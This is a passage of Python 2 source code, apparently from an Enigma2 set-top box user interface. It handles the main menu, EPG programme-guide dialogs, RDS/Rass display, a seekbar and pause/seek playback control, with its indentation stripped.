if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist2.moveDown()
self.servicelist2.zap(enable_pipzap = True)
ChannelSelectionInstance.dopipzap = False
if self.timeshiftEnabled() and self.isSeekable():
self["SeekActionsPTS"].setEnabled(True)
def volumeUp(self):
VolumeControl.instance.volUp()
def volumeDown(self):
VolumeControl.instance.volDown()
class InfoBarMenu:
""" Handles a menu action, to open the (main) menu """
def __init__(self):
self["MenuActions"] = HelpableActionMap(self, "InfobarMenuActions",
{
"mainMenu": (self.mainMenu, _("Enter main menu...")),
"showNetworkSetup": (self.showNetworkMounts, _("Show network mounts ...")),
"showSystemSetup": (self.showSystemMenu, _("Show network mounts ...")),
"showRFmod": (self.showRFSetup, _("Show RFmod setup...")),
"toggleAspectRatio": (self.toggleAspectRatio, _("Toggle aspect ratio...")),
})
self.session.infobar = None
def mainMenu(self):
# print "loading mainmenu XML..."
menu = mdom.getroot()
assert menu.tag == "menu", "root element in menu must be 'menu'!"
self.session.infobar = self
# so we can access the currently active infobar from screens opened from within the mainmenu
# at the moment used from the SubserviceSelection
self.session.openWithCallback(self.mainMenuClosed, MainMenu, menu)
def mainMenuClosed(self, *val):
self.session.infobar = None
def toggleAspectRatio(self):
ASPECT = [ "auto", "16:9", "4:3" ]
ASPECT_MSG = { "auto":"Auto", "16:9":"16:9", "4:3":"4:3" }
if config.av.aspect.value in ASPECT:
index = ASPECT.index(config.av.aspect.value)
config.av.aspect.value = ASPECT[(index+1)%3]
else:
config.av.aspect.value = "auto"
config.av.aspect.save()
self.session.open(MessageBox, _("AV aspect is %s." % ASPECT_MSG[config.av.aspect.value]), MessageBox.TYPE_INFO, timeout=5)
def showSystemMenu(self):
menulist = mdom.getroot().findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'setup_selection':
menulist = item.findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'system_selection':
menu = item
assert menu.tag == "menu", "root element in menu must be 'menu'!"
self.session.openWithCallback(self.mainMenuClosed, Menu, menu)
def showNetworkMounts(self):
menulist = mdom.getroot().findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'setup_selection':
menulist = item.findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'extended_selection':
menulist = item.findall('menu')
for item in menulist:
if item.attrib['entryID'] == 'network_menu':
menu = item
assert menu.tag == "menu", "root element in menu must be 'menu'!"
self.session.openWithCallback(self.mainMenuClosed, Menu, menu)
def showRFSetup(self):
if SystemInfo["RfModulator"]:
self.session.openWithCallback(self.mainMenuClosed, Setup, 'RFmod')
def mainMenuClosed(self, *val):
self.session.infobar = None
class InfoBarSimpleEventView:
""" Opens the Eventview for now/next """
def __init__(self):
self["EPGActions"] = HelpableActionMap(self, "InfobarEPGActions",
{
"showEventInfo": (self.openEventView, _("show event details")),
"InfoPressed": (self.openEventView, _("show event details")),
"showInfobarOrEpgWhenInfobarAlreadyVisible": self.showEventInfoWhenNotVisible,
})
def openEventView(self, simple=False):
if self.servicelist is None:
return
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
if not simple:
self.eventView = self.session.openWithCallback(self.closed, EventViewEPGSelect, epglist[0], ServiceReference(ref), self.eventViewCallback, self.openSingleServiceEPG, self.openMultiServiceEPG, self.openSimilarList)
else:
self.eventView = self.session.openWithCallback(self.closed, EventViewSimple, epglist[0], ServiceReference(ref))
self.dlg_stack.append(self.eventView)
def eventViewCallback(self, setEvent, setService, val): #used for now/next displaying
epglist = self.epglist
if len(epglist) > 1:
tmp = epglist[0]
epglist[0] = epglist[1]
epglist[1] = tmp
setEvent(epglist[0])
def showEventInfoWhenNotVisible(self):
if self.shown:
self.openEventView()
else:
self.toggleShow()
return 1
class SimpleServicelist:
def __init__(self, services):
self.services = services
self.length = len(services)
self.current = 0
def selectService(self, service):
if not self.length:
self.current = -1
return False
else:
self.current = 0
while self.services[self.current].ref != service:
self.current += 1
if self.current >= self.length:
return False
return True
def nextService(self):
if not self.length:
return
if self.current+1 < self.length:
self.current += 1
else:
self.current = 0
def prevService(self):
if not self.length:
return
if self.current-1 > -1:
self.current -= 1
else:
self.current = self.length - 1
def currentService(self):
if not self.length or self.current >= self.length:
return None
return self.services[self.current]
class InfoBarEPG:
""" EPG - Opens an EPG list when the showEPGList action fires """
def __init__(self):
self.is_now_next = False
self.dlg_stack = []
self.bouquetSel = None
self.eventView = None
self.isInfo = None
self.epglist = []
self.defaultEPGType = self.getDefaultEPGtype()
self.defaultGuideType = self.getDefaultGuidetype()
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedEventInfo: self.__evEventInfoChanged,
})
self["EPGActions"] = HelpableActionMap(self, "InfobarEPGActions",
{
"RedPressed": (self.RedPressed, _("Show epg")),
"IPressed": (self.IPressed, _("show program information...")),
"InfoPressed": (self.InfoPressed, _("show program information...")),
"showEventInfoPlugin": (self.showEventInfoPlugins, _("List EPG functions...")),
"EPGPressed": (self.showDefaultEPG, _("show EPG...")),
"showEventGuidePlugin": (self.showEventGuidePlugins, _("List EPG functions...")),
"showInfobarOrEpgWhenInfobarAlreadyVisible": self.showEventInfoWhenNotVisible,
})
def getEPGPluginList(self):
pluginlist = [(p.name, boundFunction(self.runPlugin, p)) for p in plugins.getPlugins(where = PluginDescriptor.WHERE_EVENTINFO)]
if pluginlist:
pluginlist.append((_("Event Info"), self.openEventView))
pluginlist.append((_("Graphical EPG"), self.openGraphEPG))
pluginlist.append((_("Infobar EPG"), self.openInfoBarEPG))
pluginlist.append((_("Multi EPG"), self.openMultiServiceEPG))
pluginlist.append((_("Show EPG for current channel..."), self.openSingleServiceEPG))
return pluginlist
def getDefaultEPGtype(self):
pluginlist = self.getEPGPluginList()
config.usage.defaultEPGType=ConfigSelection(default = "None", choices = pluginlist)
for plugin in pluginlist:
if plugin[0] == config.usage.defaultEPGType.value:
return plugin[1]
return None
def showEventInfoPlugins(self):
if isMoviePlayerInfoBar(self):
self.openEventView()
else:
pluginlist = self.getEPGPluginList()
if pluginlist:
# pluginlist.append((_("Select default EPG type..."), self.SelectDefaultInfoPlugin))
self.session.openWithCallback(self.EventInfoPluginChosen, ChoiceBox, title=_("Please choose an extension..."), list = pluginlist, skin_name = "EPGExtensionsList")
else:
self.openSingleServiceEPG()
def SelectDefaultInfoPlugin(self):
self.session.openWithCallback(self.DefaultInfoPluginChosen, ChoiceBox, title=_("Please select a default EPG type..."), list = self.getEPGPluginList(), skin_name = "EPGExtensionsList")
def DefaultInfoPluginChosen(self, answer):
if answer is not None:
self.defaultEPGType = answer[1]
config.usage.defaultEPGType.value = answer[0]
config.usage.defaultEPGType.save()
configfile.save()
def getDefaultGuidetype(self):
pluginlist = self.getEPGPluginList()
config.usage.defaultGuideType=ConfigSelection(default = "None", choices = pluginlist)
for plugin in pluginlist:
if plugin[0] == config.usage.defaultGuideType.value:
return plugin[1]
return None
def showEventGuidePlugins(self):
if isMoviePlayerInfoBar(self):
self.openEventView()
else:
pluginlist = self.getEPGPluginList()
if pluginlist:
pluginlist.append((_("Select default EPG type..."), self.SelectDefaultGuidePlugin))
self.session.openWithCallback(self.EventGuidePluginChosen, ChoiceBox, title=_("Please choose an extension..."), list = pluginlist, skin_name = "EPGExtensionsList")
else:
self.openSingleServiceEPG()
def SelectDefaultGuidePlugin(self):
self.session.openWithCallback(self.DefaultGuidePluginChosen, ChoiceBox, title=_("Please select a default EPG type..."), list = self.getEPGPluginList(), skin_name = "EPGExtensionsList")
def DefaultGuidePluginChosen(self, answer):
if answer is not None:
self.defaultGuideType = answer[1]
config.usage.defaultGuideType.value = answer[0]
config.usage.defaultGuideType.save()
def EventGuidePluginChosen(self, answer):
if answer is not None:
answer[1]()
def runPlugin(self, plugin):
plugin(session = self.session, servicelist=self.servicelist)
def EventInfoPluginChosen(self, answer):
if answer is not None:
answer[1]()
def RedPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
if config.usage.defaultEPGType.value != _("Graphical EPG") and config.usage.defaultEPGType.value != _("None"):
self.openGraphEPG()
else:
self.openSingleServiceEPG()
def InfoPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
if config.plisettings.PLIINFO_mode.value == "eventview":
self.openEventView()
elif config.plisettings.PLIINFO_mode.value == "epgpress":
self.showDefaultEPG()
elif config.plisettings.PLIINFO_mode.value == "single":
self.openSingleServiceEPG()
elif config.plisettings.PLIINFO_mode.value == "coolinfoguide" and COOLTVGUIDE:
self.showCoolInfoGuide()
elif config.plisettings.PLIINFO_mode.value == "coolsingleguide" and COOLTVGUIDE:
self.showCoolSingleGuide()
elif config.plisettings.PLIINFO_mode.value == "cooltvguide" and COOLTVGUIDE:
if self.isInfo:
self.showCoolTVGuide()
else:
if config.plisettings.PLIINFO_mode.value != "infobar":
self.showDefaultEPG()
def IPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
self.openEventView()
def EPGPressed(self):
if isStandardInfoBar(self) or isMoviePlayerInfoBar(self):
if config.plisettings.PLIEPG_mode.value == "pliepg":
self.openGraphEPG()
elif config.plisettings.PLIEPG_mode.value == "multi":
self.openMultiServiceEPG()
elif config.plisettings.PLIEPG_mode.value == "single":
self.openSingleServiceEPG()
elif config.plisettings.PLIEPG_mode.value == "merlinepgcenter":
self.openMerlinEPGCenter()
elif config.plisettings.PLIEPG_mode.value == "cooltvguide" and COOLTVGUIDE:
if self.isInfo:
self.showCoolTVGuide()
elif config.plisettings.PLIEPG_mode.value == "eventview":
self.openEventView()
else:
self.openSingleServiceEPG()
def showEventInfoWhenNotVisible(self):
if self.shown:
self.openEventView()
else:
self.toggleShow()
return 1
def zapToService(self, service, bouquet = None, preview = False, zapback = False):
if self.servicelist.startServiceRef is None:
self.servicelist.startServiceRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.servicelist.currentServiceRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if service is not None:
if self.servicelist.getRoot() != bouquet: #already in correct bouquet?
self.servicelist.clearPath()
if self.servicelist.bouquet_root != bouquet:
self.servicelist.enterPath(self.servicelist.bouquet_root)
self.servicelist.enterPath(bouquet)
self.servicelist.setCurrentSelection(service) #select the service in servicelist
if not zapback or preview:
self.servicelist.zap(preview_zap = preview)
if (self.servicelist.dopipzap or zapback) and not preview:
self.servicelist.zapBack()
if not preview:
self.servicelist.startServiceRef = None
self.servicelist.startRoot = None
def getBouquetServices(self, bouquet):
services = []
servicelist = eServiceCenter.getInstance().list(bouquet)
if not servicelist is None:
while True:
service = servicelist.getNext()
if not service.valid(): #check if end of list
break
if service.flags & (eServiceReference.isDirectory | eServiceReference.isMarker): #ignore non playable services
continue
services.append(ServiceReference(service))
return services
def openBouquetEPG(self, bouquet = None, bouquets = None):
if bouquet:
self.StartBouquet = bouquet
self.dlg_stack.append(self.session.openWithCallback(self.closed, EPGSelection, zapFunc=self.zapToService, EPGtype=self.EPGtype, StartBouquet=self.StartBouquet, StartRef=self.StartRef, bouquets = bouquets))
def closed(self, ret=False):
if not self.dlg_stack:
return
closedScreen = self.dlg_stack.pop()
if self.bouquetSel and closedScreen == self.bouquetSel:
self.bouquetSel = None
elif self.eventView and closedScreen == self.eventView:
self.eventView = None
if ret == True or ret == 'close':
dlgs=len(self.dlg_stack)
if dlgs > 0:
self.dlg_stack[dlgs-1].close(dlgs > 1)
self.reopen(ret)
def MultiServiceEPG(self):
bouquets = self.servicelist.getBouquetList()
if bouquets is None:
cnt = 0
else:
cnt = len(bouquets)
if (self.EPGtype == "multi" and config.epgselection.multi_showbouquet.value) or (self.EPGtype == "graph" and config.epgselection.graph_showbouquet.value):
if cnt > 1: # show bouquet list
self.bouquetSel = self.session.openWithCallback(self.closed, EpgBouquetSelector, bouquets, self.openBouquetEPG, enableWrapAround=True)
self.dlg_stack.append(self.bouquetSel)
elif cnt == 1:
self.openBouquetEPG(bouquets=bouquets)
else:
self.openBouquetEPG(bouquets=bouquets)
def openMultiServiceEPG(self):
if self.servicelist is None:
return
self.EPGtype = "multi"
self.StartBouquet = self.servicelist.getRoot()
if isMoviePlayerInfoBar(self):
self.StartRef = self.lastservice
else:
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.MultiServiceEPG()
def openGraphEPG(self, reopen=False):
if self.servicelist is None:
return
self.EPGtype = "graph"
if not reopen:
self.StartBouquet = self.servicelist.getRoot()
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.MultiServiceEPG()
def openSingleServiceEPG(self, reopen=False):
if self.servicelist is None:
return
self.EPGtype = "enhanced"
self.SingleServiceEPG()
def openInfoBarEPG(self, reopen=False):
if self.servicelist is None:
return
if not reopen:
self.StartBouquet = self.servicelist.getRoot()
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if config.epgselection.infobar_type_mode.value == 'single':
self.EPGtype = "infobar"
self.SingleServiceEPG()
else:
self.EPGtype = "infobargraph"
self.MultiServiceEPG()
def showCoolTVGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool TV Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def SingleServiceEPG(self):
self.StartBouquet = self.servicelist.getRoot()
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if isMoviePlayerInfoBar(self):
ref = self.lastservice
else:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref:
services = self.getBouquetServices(self.StartBouquet)
self.serviceSel = SimpleServicelist(services)
if self.serviceSel.selectService(ref):
self.session.openWithCallback(self.SingleServiceEPGClosed,EPGSelection, self.servicelist, zapFunc=self.zapToService, serviceChangeCB = self.changeServiceCB, EPGtype=self.EPGtype, StartBouquet=self.StartBouquet, StartRef=self.StartRef)
else:
self.session.openWithCallback(self.SingleServiceEPGClosed, EPGSelection, ref)
def changeServiceCB(self, direction, epg):
if self.serviceSel:
if direction > 0:
self.serviceSel.nextService()
else:
self.serviceSel.prevService()
epg.setService(self.serviceSel.currentService())
def SingleServiceEPGClosed(self, ret=False):
self.serviceSel = None
self.reopen(ret)
def reopen(self, answer):
if answer == 'reopengraph':
self.openGraphEPG(True)
elif answer == 'reopeninfobargraph' or answer == 'reopeninfobar':
self.openInfoBarEPG(True)
elif answer == 'close' and isMoviePlayerInfoBar(self):
self.lastservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.close()
def openMerlinEPGCenter(self):
if self.servicelist is None:
return
if fileExists("/usr/lib/enigma2/python/Plugins/Extensions/MerlinEPGCenter/plugin.pyo"):
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Merlin EPG Center"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Merlin EPG Center plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolInfoGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Info Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolSingleGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Single Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openSimilarList(self, eventid, refstr):
self.session.open(EPGSelection, refstr, eventid=eventid)
def getNowNext(self):
epglist = [ ]
service = self.session.nav.getCurrentService()
info = service and service.info()
ptr = info and info.getEvent(0)
if ptr and ptr.getEventName() != "":
epglist.append(ptr)
ptr = info and info.getEvent(1)
if ptr and ptr.getEventName() != "":
epglist.append(ptr)
self.epglist = epglist
def __evEventInfoChanged(self):
self.isInfo = True
if self.is_now_next and len(self.dlg_stack) == 1:
self.getNowNext()
if self.eventView and self.epglist:
self.eventView.setEvent(self.epglist[0])
def showDefaultEPG(self):
if self.defaultEPGType is not None:
self.defaultEPGType()
return
self.EPGPressed()
def openEventView(self, simple=False):
if self.servicelist is None:
return
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
if not simple:
self.eventView = self.session.openWithCallback(self.closed, EventViewEPGSelect, epglist[0], ServiceReference(ref), self.eventViewCallback, self.openSingleServiceEPG, self.openMultiServiceEPG, self.openSimilarList)
else:
self.eventView = self.session.openWithCallback(self.closed, EventViewSimple, epglist[0], ServiceReference(ref))
self.dlg_stack.append(self.eventView)
def eventViewCallback(self, setEvent, setService, val): #used for now/next displaying
epglist = self.epglist
if len(epglist) > 1:
tmp = epglist[0]
epglist[0]=epglist[1]
epglist[1]=tmp
setEvent(epglist[0])
class InfoBarRdsDecoder:
"""provides RDS and Rass support/display"""
def __init__(self):
self.rds_display = self.session.instantiateDialog(RdsInfoDisplay)
self.session.instantiateSummaryDialog(self.rds_display)
self.rds_display.setAnimationMode(0)
self.rass_interactive = None
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evEnd: self.__serviceStopped,
iPlayableService.evUpdatedRassSlidePic: self.RassSlidePicChanged
})
self["RdsActions"] = ActionMap(["InfobarRdsActions"],
{
"startRassInteractive": self.startRassInteractive
},-1)
self["RdsActions"].setEnabled(False)
self.onLayoutFinish.append(self.rds_display.show)
self.rds_display.onRassInteractivePossibilityChanged.append(self.RassInteractivePossibilityChanged)
def RassInteractivePossibilityChanged(self, state):
self["RdsActions"].setEnabled(state)
def RassSlidePicChanged(self):
if not self.rass_interactive:
service = self.session.nav.getCurrentService()
decoder = service and service.rdsDecoder()
if decoder:
decoder.showRassSlidePicture()
def __serviceStopped(self):
if self.rass_interactive is not None:
rass_interactive = self.rass_interactive
self.rass_interactive = None
rass_interactive.close()
def startRassInteractive(self):
self.rds_display.hide()
self.rass_interactive = self.session.openWithCallback(self.RassInteractiveClosed, RassInteractive)
def RassInteractiveClosed(self, *val):
if self.rass_interactive is not None:
self.rass_interactive = None
self.RassSlidePicChanged()
self.rds_display.show()
class Seekbar(Screen):
def __init__(self, session, fwd):
Screen.__init__(self, session)
self.setTitle(_("Seek"))
self.session = session
self.fwd = fwd
self.percent = 0.0
self.length = None
service = session.nav.getCurrentService()
if service:
self.seek = service.seek()
if self.seek:
self.length = self.seek.getLength()
position = self.seek.getPlayPosition()
if self.length and position and int(self.length[1]) > 0:
if int(position[1]) > 0:
self.percent = float(position[1]) * 100.0 / float(self.length[1])
else:
self.close()
self["cursor"] = MovingPixmap()
self["time"] = Label()
self["actions"] = ActionMap(["WizardActions", "DirectionActions"], {"back": self.exit, "ok": self.keyOK, "left": self.keyLeft, "right": self.keyRight}, -1)
self.cursorTimer = eTimer()
self.cursorTimer.callback.append(self.updateCursor)
self.cursorTimer.start(200, False)
def updateCursor(self):
if self.length:
screenwidth = getDesktop(0).size().width()
if screenwidth and screenwidth == 1920:
x = 218 + int(4.05 * self.percent)
self["cursor"].moveTo(x, 23, 1)
else:
x = 145 + int(2.7 * self.percent)
self["cursor"].moveTo(x, 15, 1)
self["cursor"].startMoving()
pts = int(float(self.length[1]) / 100.0 * self.percent)
self["time"].setText("%d:%02d" % ((pts/60/90000), ((pts/90000)%60)))
def exit(self):
self.cursorTimer.stop()
self.close()
def keyOK(self):
if self.length:
self.seek.seekTo(int(float(self.length[1]) / 100.0 * self.percent))
self.exit()
def keyLeft(self):
self.percent -= float(config.seek.sensibility.value) / 10.0
if self.percent < 0.0:
self.percent = 0.0
def keyRight(self):
self.percent += float(config.seek.sensibility.value) / 10.0
if self.percent > 100.0:
self.percent = 100.0
def keyNumberGlobal(self, number):
sel = self["config"].getCurrent()[1]
if sel == self.positionEntry:
self.percent = float(number) * 10.0
else:
ConfigListScreen.keyNumberGlobal(self, number)
class InfoBarSeek:
"""handles actions like seeking, pause"""
SEEK_STATE_PLAY = (0, 0, 0, ">")
SEEK_STATE_PAUSE = (1, 0, 0, "||")
SEEK_STATE_EOF = (1, 0, 0, "END")
def __init__(self, actionmap = "InfobarSeekActions"):
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evSeekableStatusChanged: self.__seekableStatusChanged,
iPlayableService.evStart: self.__serviceStarted,
iPlayableService.evEOF: self.__evEOF,
iPlayableService.evSOF: self.__evSOF,
})
self.fast_winding_hint_message_showed = False
class InfoBarSeekActionMap(HelpableActionMap):
def __init__(self, screen, *args, **kwargs):
HelpableActionMap.__init__(self, screen, *args, **kwargs)
self.screen = screen
def action(self, contexts, action):
if action[:5] == "seek:":
time = int(action[5:])
self.screen.doSeekRelative(time * 90000)
return 1
elif action[:8] == "seekdef:":
key = int(action[8:])
time = (-config.seek.selfdefined_13.value, False, config.seek.selfdefined_13.value,
-config.seek.selfdefined_46.value, False, config.seek.selfdefined_46.value,
-config.seek.selfdefined_79.value, False, config.seek.selfdefined_79.value)[key-1]
self.screen.doSeekRelative(time * 90000)
return 1
else:
return HelpableActionMap.action(self, contexts, action)
self['SeekActions'] = InfoBarSeekActionMap(self, actionmap, {'playpauseService': (self.playpauseService, _('Pause/Continue playback')),
'pauseService': (self.pauseService, _('Pause playback')),
'pauseServiceYellow': (self.pauseServiceYellow, _('Pause playback')),
'unPauseService': (self.unPauseService, _('Continue playback')),
'okButton': (self.okButton, _('Continue playback')),
'seekFwd': (self.seekFwd, _('Seek forward')),
'seekFwdManual': (self.seekFwdManual, _('Seek forward (enter time)')),
'seekBack': (self.seekBack, _('Seek backward')),
'seekBackManual': (self.seekBackManual, _('Seek backward (enter time)')),
'SeekbarFwd': self.seekFwdSeekbar,
'SeekbarBack': self.seekBackSeekbar}, prio=-1)
self['SeekActions'].setEnabled(False)
self['SeekActionsPTS'] = InfoBarSeekActionMap(self, 'InfobarSeekActionsPTS', {'playpauseService': self.playpauseService,
'pauseService': (self.pauseService, _('Pause playback')),
'pauseServiceYellow': (self.pauseServiceYellow, _('Pause playback')),
'unPauseService': (self.unPauseService, _('Continue playback')),
'seekFwd': (self.seekFwd, _('skip forward')),
'seekFwdManual': (self.seekFwdManual, _('skip forward (enter time)')),
'seekBack': (self.seekBack, _('skip backward')),
'seekBackManual': (self.seekBackManual, _('skip backward (enter time)'))}, prio=-1)
self['SeekActionsPTS'].setEnabled(False)
self.activity = 0
self.activityTimer = eTimer()
self.activityTimer.callback.append(self.doActivityTimer)
self.seekstate = self.SEEK_STATE_PLAY
self.lastseekstate = self.SEEK_STATE_PLAY
self.seekAction = 0
self.LastseekAction = False
self.onPlayStateChanged = []
self.lockedBecauseOfSkipping = False
self.__seekableStatusChanged()
def makeStateForward(self, n):
return 0, n, 0, ">> %dx" % n
def makeStateBackward(self, n):
return 0, -n, 0, "<< %dx" % n
def makeStateSlowMotion(self, n):
return 0, 0, n, "/%d" % n
def isStateForward(self, state):
return state[1] > 1
def isStateBackward(self, state):
return state[1] < 0
def isStateSlowMotion(self, state):
return state[1] == 0 and state[2] > 1
def getHigher(self, n, lst):
for x in lst:
if x > n:
return x
return False
def getLower(self, n, lst):
lst = lst[:]
lst.reverse()
for x in lst:
if x < n:
return x
return False
def showAfterSeek(self):
if isinstance(self, InfoBarShowHide):
self.doShow()
def up(self):
pass
def down(self):
pass
def getSeek(self):
service = self.session.nav.getCurrentService()
if service is None:
return
else:
seek = service.seek()
if seek is None or not seek.isCurrentlySeekable():
return
return seek
def isSeekable(self):
if config.usage.enableVodMode.value:
name = None
if self.session.nav.getCurrentlyPlayingServiceReference():
url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
name = self.session.nav.getCurrentlyPlayingServiceReference().toString().startswith('4097:')
ext = ['.3g2',
'.3gp',
'.asf',
'.asx',
'.avi',
'.flv',
'.m2ts',
'.mkv',
'.mov',
'.mp4',
'.mpg',
'.mpeg',
'.rm',
'.swf',
'.vob',
'.wmv']
if self.getSeek() is None or isStandardInfoBar(self) and not self.timeshiftEnabled() and name == False and str(url).endswith(tuple(ext)):
return False
elif self.getSeek() is None or isStandardInfoBar(self) and not self.timeshiftEnabled():
return False
return True
def __seekableStatusChanged(self):
global seek_withjumps_muted
if isStandardInfoBar(self) and self.timeshiftEnabled():
pass
elif not self.isSeekable():
SystemInfo["SeekStatePlay"] = False
if os.path.exists("/proc/stb/lcd/symbol_hdd"):
f = open("/proc/stb/lcd/symbol_hdd", "w")
f.write("0")
f.close()
if os.path.exists("/proc/stb/lcd/symbol_hddprogress"):
f = open("/proc/stb/lcd/symbol_hddprogress", "w")
f.write("0")
f.close()
self["SeekActions"].setEnabled(False)
self.setSeekState(self.SEEK_STATE_PLAY)
else:
self["SeekActions"].setEnabled(True)
self.activityTimer.start(int(config.seek.withjumps_repeat_ms.getValue()), False)
for c in self.onPlayStateChanged:
c(self.seekstate)
if seek_withjumps_muted and eDVBVolumecontrol.getInstance().isMuted():
print "STILL MUTED AFTER FFWD/FBACK !!!!!!!! so we unMute"
seek_withjumps_muted = False
eDVBVolumecontrol.getInstance().volumeUnMute()
def doActivityTimer(self):
if self.isSeekable():
self.activity += 16
hdd = 1
if self.activity >= 100:
self.activity = 0
if SystemInfo["FrontpanelDisplay"] and SystemInfo["Display"]:
if os.path.exists("/proc/stb/lcd/symbol_hdd"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hdd", "w")
file.write('%d' % int(hdd))
file.close()
if os.path.exists("/proc/stb/lcd/symbol_hddprogress"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hddprogress", "w")
file.write('%d' % int(self.activity))
file.close()
else:
self.activityTimer.stop()
self.activity = 0
hdd = 0
self.seekAction = 0
if os.path.exists("/proc/stb/lcd/symbol_hdd"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hdd", "w")
file.write('%d' % int(hdd))
file.close()
if os.path.exists("/proc/stb/lcd/symbol_hddprogress"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hddprogress", "w")
file.write('%d' % int(self.activity))
file.close()
if self.LastseekAction:
self.DoSeekAction()
def __serviceStarted(self):
self.fast_winding_hint_message_showed = False
self.setSeekState(self.SEEK_STATE_PLAY)
self.__seekableStatusChanged()
def setSeekState(self, state):
service = self.session.nav.getCurrentService()
if service is None:
return False
else:
if not self.isSeekable():
if state not in (self.SEEK_STATE_PLAY, self.SEEK_STATE_PAUSE):
state = self.SEEK_STATE_PLAY
pauseable = service.pause()
if pauseable is None:
state = self.SEEK_STATE_PLAY
self.seekstate = state
if pauseable is not None:
if self.seekstate[0] and self.seekstate[3] == '||':
self.activityTimer.stop()
pauseable.pause()
elif self.seekstate[0] and self.seekstate[3] == 'END':
self.activityTimer.stop()
elif self.seekstate[1]:
if not pauseable.setFastForward(self.seekstate[1]):
pass
else:
self.seekstate = self.SEEK_STATE_PLAY
elif self.seekstate[2]:
if not pauseable.setSlowMotion(self.seekstate[2]):
pass
else:
self.seekstate = self.SEEK_STATE_PAUSE
else:
self.activityTimer.start(int(config.seek.withjumps_repeat_ms.getValue()), False)
pauseable.unpause()
for c in self.onPlayStateChanged:
c(self.seekstate)
self.checkSkipShowHideLock()
if hasattr(self, 'ScreenSaverTimerStart'):
self.ScreenSaverTimerStart()
return True
def okButton(self):
if self.seekstate == self.SEEK_STATE_PLAY:
return 0
if self.seekstate == self.SEEK_STATE_PAUSE:
self.pauseService()
else:
self.unPauseService()
def playpauseService(self):
global seek_withjumps_muted
if self.seekAction != 0:
self.seekAction = 0
self.doPause(False)
seek_withjumps_muted = False
return
if self.seekstate == self.SEEK_STATE_PLAY:
self.pauseService()
elif self.seekstate == self.SEEK_STATE_PAUSE:
if config.seek.on_pause.value == 'play':
self.unPauseService()
elif config.seek.on_pause.value == 'step':
self.doSeekRelative(1)
elif config.seek.on_pause.value == 'last':
self.setSeekState(self.lastseekstate)
self.lastseekstate = self.SEEK_STATE_PLAY
else:
self.unPauseService()
def pauseService(self):
if self.seekstate != self.SEEK_STATE_EOF:
self.lastseekstate = self.seekstate
self.setSeekState(self.SEEK_STATE_PAUSE)
def pauseServiceYellow(self):
if self.seekstate != self.SEEK_STATE_EOF:
self.lastseekstate = self.seekstate
self.setSeekState(self.SEEK_STATE_PAUSE)
else:
self.playpauseService()
def unPauseService(self):
if self.seekstate == self.SEEK_STATE_PLAY:
if self.seekAction != 0:
self.playpauseService()
return
self.doPause(False)
self.setSeekState(self.SEEK_STATE_PLAY)
def doPause(self, pause):
if pause:
if not eDVBVolumecontrol.getInstance().isMuted():
eDVBVolumecontrol.getInstance().volumeMute()
